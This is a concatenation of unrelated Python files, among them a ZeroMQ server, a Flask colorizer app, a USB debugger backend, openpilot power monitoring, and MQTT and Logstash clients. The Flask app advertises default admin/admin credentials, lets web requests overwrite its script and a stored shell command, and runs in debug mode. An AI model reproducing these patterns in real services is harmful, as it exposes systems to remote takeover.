print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
remote_Server.py
|
#
# Created on Sat Oct 09 2021
# Author: Owen Yip
# Mail: me@owenyip.com
#
import os, sys
import threading
import numpy as np
import time
import zmq
import json
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
class SERVER(object):
def __init__(self):
super(SERVER, self).__init__()
context = zmq.Context()
self.send_port = 8008
self.send_topic = "Server Sends"
self.send_socket = context.socket(zmq.PUB)
self.send_socket.bind("tcp://*:%d" % self.send_port)
self.recv_port = 8080
self.recv_topic = "Client Sends"
self.recv_socket = context.socket(zmq.SUB)
self.recv_socket.bind("tcp://*:%d" % self.recv_port)
self.recv_socket.setsockopt_string(zmq.SUBSCRIBE, self.recv_topic)
def send(self, message):
message = json.dumps(message)
msg = "%s%s" % (self.send_topic, message)
self.send_socket.send_string(msg)
print("Sending data:", message)
def send_forever(self, message=''):
i = 0
while True:
self.send(message + str(i))
i += 1
i %= 100000
time.sleep(1)
def receive(self):
message = self.recv_socket.recv_string()
return message[len(self.recv_topic):]
def recv_forever(self):
while True:
message = self.receive()
control = json.loads(message)
print("Received request:", control)
if __name__ == "__main__":
msg = 'server to client'
server = SERVER()
p1 = threading.Thread(target=server.send_forever, args=((msg,)))
p2 = threading.Thread(target=server.recv_forever, args=())
p1.start()
p2.start()
print('Prepared to send data')
print('Prepared to receive data')
p1.join()
p2.join()
|
app.py
|
# serve.py
from flask import Flask, request, render_template, send_from_directory, Blueprint, jsonify, Response
from werkzeug.utils import secure_filename
from werkzeug.datastructures import CombinedMultiDict
import logging,os,subprocess,sys
from script import ClouderizerEval
from functools import wraps
import json
import threading
import logging
# creates a Flask application, named app
app = Flask(__name__)
cldz_eval = ClouderizerEval(app)
PROJECT_HOME = os.path.dirname(os.path.realpath(__file__))
UPLOAD_FOLDER = '{}/uploads/'.format(PROJECT_HOME)
OUTPUT_FOLDER = '{}/output/'.format(PROJECT_HOME)
app.config.from_json('config.json')
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['OUTPUT_FOLDER'] = OUTPUT_FOLDER
#app.config['COMMAND'] = "python ../code/fast_neural_style/neural_style/neural_style.py eval --content-image $IMG1$ --model ../code/fast_neural_style/saved_models/rain_princess.pth --output-image $OIMG1$ --cuda 0"
#app.config['COMMAND'] = ""
sys.path.append(os.path.abspath("../code/"))
from fastai.torch_imports import *
from fastai.core import *
from fasterai.filters import Colorizer34
from fasterai.visualize import ModelImageVisualizer
def check_auth(username, password):
"""This function is called to check if a username /
password combination is valid.
"""
return username == app.config['UNAME'] and password == app.config['PASSWORD']
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required. Default credentials admin/admin"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
def updateConfig(key, value):
jsonFile = open("config.json", "r") # Open the JSON file for reading
data = json.load(jsonFile) # Read the JSON into the buffer
jsonFile.close() # Close the JSON file
## Working with buffered content
data[key] = value
## Save our changes to JSON file
jsonFile = open("config.json", "w+")
jsonFile.write(json.dumps(data))
jsonFile.close()
def create_new_folder(local_dir):
newpath = local_dir
if not os.path.exists(newpath):
os.makedirs(newpath)
return newpath
# Quick fix for 504 Gateway error due to model initialization
colorizer_path = '../code/colorize_gen_192.h5'
render_factor = 42
ALLOWED_EXTENSIONS = set(['jpg', 'jpeg'])
cldz_serve_outputdir = "./output"
filters=None
vis=None
def run_job():
global filters, vis
print('Loading models')
filters = [Colorizer34(gpu=0, weights_path=colorizer_path,nf_factor=2, map_to_orig=True)]
vis = ModelImageVisualizer(filters, render_factor=42, results_dir=cldz_serve_outputdir)
print('model loading is done')
modelThread = threading.Thread(target=run_job)
modelThread.start()
def model_inference(requestparams):
if 'image' not in requestparams:
return BadRequest("File not present in request")
file = requestparams['image']
if file.filename == '':
return BadRequest("File name is not present in request")
if not allowed_file(file.filename):
return BadRequest("Invalid file type")
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
input_filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
output_filepath = Path(os.path.join(app.config['OUTPUT_FOLDER'], filename))
file.save(input_filepath)
# modelThread.join()
print(vis)
if vis is not None:
try:
result = vis.get_transformed_image_ndarray(input_filepath)
vis.save_result_image(output_filepath, result)
except AttributeError:
pass
else:
return jsonify("Model initialising"), "object"
output = {}
output["directory"]=app.config['OUTPUT_FOLDER']
output["filename"]=filename
# app.logger.info(requestparams)
return output, "imagepath"
# a route where we will display a welcome message via an HTML template
@app.route("/", defaults={'path': ''})
@app.route("/<path:path>")
def home(path):
dir = os.path.join(os.curdir, 'static')
bp = Blueprint('cast', __name__, static_folder=dir, static_url_path='')
if(path == ''):
return bp.send_static_file('index.html')
else:
return bp.send_static_file(path)
@app.route("/api/eval", methods = ['POST'])
def eval():
output, outputtype = model_inference(CombinedMultiDict((request.files, request.form)))
if outputtype == 'imagepath':
return send_from_directory(directory=output['directory'],filename=output['filename'], as_attachment=True)
elif outputtype == 'object':
return output
else:
return "Some error occured"
@app.route("/api/script", methods = ['GET'])
@requires_auth
def getEvalCode():
with open("script.py", "r") as f:
content = f.read()
return jsonify(
text=content
)
@app.route("/api/script", methods = ['POST'])
@requires_auth
def updateEvalCode():
script = request.form['script']
with open("script.py", "w") as f:
f.write(script)
return jsonify(
success=True
)
@app.route("/api/command", methods = ['GET'])
@requires_auth
def getCommand():
return jsonify(
text=app.config['COMMAND']
)
@app.route("/api/command", methods = ['POST'])
@requires_auth
def updateCommand():
command = request.form['command']
app.config['COMMAND'] = command
updateConfig('COMMAND', command)
return jsonify(
success=True
)
@app.route("/api/projname", methods = ['GET'])
def getProjName():
return jsonify(
projectname=app.config['PROJECTNAME']
)
@app.route("/api/credentials", methods = ['POST'])
@requires_auth
def updateCredentials():
uname = request.form['uname']
password = request.form['password']
app.config['UNAME'] = uname
app.config['PASSWORD'] = password
updateConfig('UNAME', uname)
updateConfig('PASSWORD', password)
return Response(
'Credentials updated. Login again.', 401)
@app.route("/api/logout", methods = ['GET'])
@requires_auth
def logout():
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401)
# run the application
if __name__ == "__main__":
app.run(debug=True)
|
pyusb_backend.py
|
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from interface import Interface
import logging, os, threading
from ..dap_access_api import DAPAccessIntf
try:
import usb.core
import usb.util
except:
if os.name == "posix" and not os.uname()[0] == 'Darwin':
logging.error("PyUSB is required on a Linux Machine")
isAvailable = False
else:
isAvailable = True
class PyUSB(Interface):
"""
This class provides basic functions to access
a USB HID device using pyusb:
- write/read an endpoint
"""
isAvailable = isAvailable
def __init__(self):
super(PyUSB, self).__init__()
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rcv_data = []
self.read_sem = threading.Semaphore(0)
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=FindDap(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" %
self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get hid interface
interface = None
interface_number = None
for interface in config:
if interface.bInterfaceClass == 0x03:
interface_number = interface.bInterfaceNumber
break
if interface_number is None or interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no hid interface" %
self.serial_number)
# Find endpoints
ep_in, ep_out = None, None
for endpoint in interface:
if endpoint.bEndpointAddress & 0x80:
ep_in = endpoint
else:
ep_out = endpoint
# If there is no EP for OUT then we can use CTRL EP.
# The IN EP is required
if not ep_in:
raise DAPAccessIntf.DeviceError("Unable to open device -"
" no endpoints")
# Detach kernel driver
kernel_driver_was_attached = False
try:
if dev.is_kernel_driver_active(interface_number):
dev.detach_kernel_driver(interface_number)
kernel_driver_was_attached = True
except NotImplementedError as e:
# Some implementations don't don't have kernel attach/detach
logging.debug('Exception detaching kernel driver: %s' %
str(e))
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError:
raise DAPAccessIntf.DeviceError("Unable to open device")
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.dev = dev
self.intf_number = interface_number
self.kernel_driver_was_attached = kernel_driver_was_attached
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.thread = threading.Thread(target=self.rx_task)
self.thread.daemon = True
self.thread.start()
def rx_task(self):
try:
while not self.closed:
self.read_sem.acquire()
if not self.closed:
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
@staticmethod
def getAllConnectedInterface():
"""
returns all the connected devices which matches PyUSB.vid/PyUSB.pid.
returns an array of PyUSB (Interface) objects
"""
# find all cmsis-dap devices
all_devices = usb.core.find(find_all=True, custom_match=FindDap())
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSB()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""
write data on the OUT endpoint associated to the HID interface
"""
report_size = 64
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
if not self.ep_out:
bmRequestType = 0x21 #Host to device request of type Class of Recipient Interface
bmRequest = 0x09 #Set_REPORT (HID class-specific request for transferring data over EP0)
wValue = 0x200 #Issuing an OUT report
wIndex = self.intf_number #mBed Board interface number for HID
self.dev.ctrl_transfer(bmRequestType, bmRequest, wValue, wIndex, data)
return
#raise ValueError('EP_OUT endpoint is NULL')
self.ep_out.write(data)
#logging.debug('sent: %s', data)
return
def read(self):
"""
read data on the IN endpoint associated to the HID interface
"""
while len(self.rcv_data) == 0:
pass
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited" %
self.serial_number)
return self.rcv_data.pop(0)
def setPacketCount(self, count):
# No interface level restrictions on count
self.packet_count = count
def getSerialNumber(self):
return self.serial_number
def close(self):
"""
close the interface
"""
assert self.closed is False
logging.debug("closing interface")
self.closed = True
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
usb.util.release_interface(self.dev, self.intf_number)
if self.kernel_driver_was_attached:
try:
self.dev.attach_kernel_driver(self.intf_number)
except Exception as exception:
logging.warning('Exception attaching kernel driver: %s',
str(exception))
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.kernel_driver_was_attached = False
self.thread = None
class FindDap(object):
"""CMSIS-DAP match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""Return True if this is a DAP device, False otherwise"""
try:
device_string = dev.product
except ValueError:
# Permission denied error gets reported as ValueError (langid)
return False
except usb.core.USBError as error:
logging.warning("Exception getting product string: %s", error)
return False
except IndexError as error:
logging.warning("Internal pyusb error: %s", error)
return False
if device_string is None:
return False
if device_string.find("CMSIS-DAP") < 0:
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 12.4 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 7*3600
MIN_ON_TIME_S = 3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.car_voltage_instant_mV = 12e3 # Last value of pandaState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = pandaState.pandaState.voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= (pandaState.pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected)
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
|
VideoGuardar.py
|
import threading
import cv2
def getFrame():
global frame
while True:
frame = video_capture.read()[1]
def face_analyse():
while True:
pass
#do some of the opeartion you want
def realtime():
while True:
cv2.imshow('Video', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
video_capture.release()
cv2.destroyAllWindows()
break
if __name__ == "__main__":
video_capture = cv2.VideoCapture(0)
frame = video_capture.read()[1]
cv2.imwrite("imagen2.jpg",frame,params=None)
gfthread = threading.Thread(target=getFrame, args='')
gfthread.daemon = True
gfthread.start()
rtthread = threading.Thread(target=realtime, args='')
rtthread.daemon = True
rtthread.start()
fathread = threading.Thread(target=face_analyse, args='')
fathread.daemon = True
fathread.start()
while True: #keep main thread running while the other two threads are non-daemon
pass
|
send data to simulated feed with paho-mqtt publish.py
|
# Import standard python modules
import threading
import time
import os
import sys
# Import paho MQTT client.
import paho.mqtt.client as mqtt
# Define callback functions which will be called when certain events happen.
def on_connect(client, userdata, flags, rc):
# Connected function will be called when the client connects.
print("Conectado con codigo resultante: "+str(rc))
client.connectedFlag=True
def on_disconnect(client):
# Disconnected function will be called when the client disconnects.
print("¡Se ha Desconectado!")
os._exit(1)
# Define Functions for Threading
def send_message(client):
while True:
if(client.messageSend is not None):
client.publish("area9876/tanque0/capacidad", client.messageSend)
time.sleep(10)
if __name__ == "__main__":
if(len(sys.argv)!=2):
sys.stderr.write('Usage: "{0}" $hostAddress\n'.format(sys.argv[0]))
os._exit(1)
# Setup MQTT Client Instance
client = mqtt.Client()
# Setup Callbacks
client.on_connect = on_connect
client.on_disconnect=on_disconnect
# Setup Control Vars
client.connectedFlag=False
client.messageSend="0"
# Connect to the Broker server.
print("Conectando al broker")
client.connect(host=sys.argv[1], port=1883, keepalive=60)
client.loop_start()
while not client.connectedFlag:
print("Esperando conexión")
time.sleep(1)
# Setup Threading, to publish message every 10 seconds
hilo0=threading.Thread(target=send_message, args=(client,))
hilo0.start()
# Mod publish value
while client.messageSend!="x": # char 'x' to exit
client.messageSend=input("Ingrese nuevo valor para el tanque\n")
client.loop_stop()
client.disconnect()
|
client.py
|
import json
import logging
import socket
import threading
from queue import Queue, Empty
logger = logging.getLogger('logstash_client')
class LogStashClient(object):
"""
Logstash client which helps sending data to logstash service via TCP protocol in json format
"""
_instance = None
def __init__(self, hostname, port):
self._hostname = hostname
self._port = port
self._queue = Queue()
self._max_batch = 10
def send_data(self, module, data: dict):
data['module'] = module
self._queue.put(data, block=False)
def _process_data(self):
while True:
try:
data_to_send = [self._queue.get(block=True, timeout=10)]
max_batch = self._max_batch
while max_batch > 0:
# check if more data available and batch it
try:
data_to_send.append(self._queue.get_nowait())
max_batch -= 1
except Empty:
break
if not self._hostname or not self._port:
continue
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect((self._hostname, self._port))
sock.settimeout(5)
try:
logger.info("Sending {} data chunks to logstash".format(len(data_to_send)))
for data in data_to_send:
sock.send(str(json.dumps(data)).encode('utf-8'))
finally:
sock.close()
except Empty:
# waiting again for more data
continue
except socket.error as msg:
logger.error("Failed to send data to logstash: {}".format(msg))
except Exception as exc:
logger.exception("Failed to send data to logstash: {}".format(exc))
@staticmethod
def configure_client(hostname, port):
LogStashClient._instance = LogStashClient(hostname, port)
@staticmethod
def start_client():
if not LogStashClient._instance:
raise Exception("LogStashClient should be configured first, call 'configure_client' before.")
thread = threading.Thread(target=LogStashClient._instance._process_data, daemon=True)
thread.start()
@staticmethod
def get_client():
"""
:rtype: LogStashClient
"""
return LogStashClient._instance
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from typing import Optional
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
from selfdrive.statsd import statlog
from selfdrive.car.modules.CFG_module import load_float_param
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = load_float_param("TinklaShutdownAfter",3.0)*3600
MIN_ON_TIME_S = 3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of peripheralState voltage
self.car_voltage_instant_mV = 12e3 # Last value of peripheralState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, peripheralState, ignition):
try:
now = sec_since_boot()
# If peripheralState is None, we're probably not in a car, so we don't care
if peripheralState is None or peripheralState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = peripheralState.voltage
self.car_voltage_mV = ((peripheralState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
statlog.gauge("car_voltage", self.car_voltage_mV / 1e3)
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if ignition:
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t: float, current_power: float) -> None:
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self) -> int:
return int(self.power_used_uWh)
def get_car_battery_capacity(self) -> int:
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, ignition: bool, in_car: bool, offroad_timestamp: Optional[float]) -> bool:
if offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= not ignition
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= in_car
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, peripheralState, ignition, in_car, offroad_timestamp, started_seen):
if offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(ignition, in_car, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
|
base.py
|
import logging
import threading
import time
log = logging.getLogger(__name__)
class BaseStrategy:
"""Implements threshold-interval based flow control.
The overall goal is to trap the flow of apps from the
workflow, measure it and redirect it the appropriate executors for
processing.
This is based on the following logic:
.. code-block:: none
BEGIN (INTERVAL, THRESHOLD, callback) :
start = current_time()
while (current_time()-start < INTERVAL) :
count = get_events_since(start)
if count >= THRESHOLD :
break
callback()
This logic ensures that the callbacks are activated with a maximum delay
of `interval` for systems with infrequent events as well as systems which would
generate large bursts of events.
Once a callback is triggered, the callback generally runs a strategy
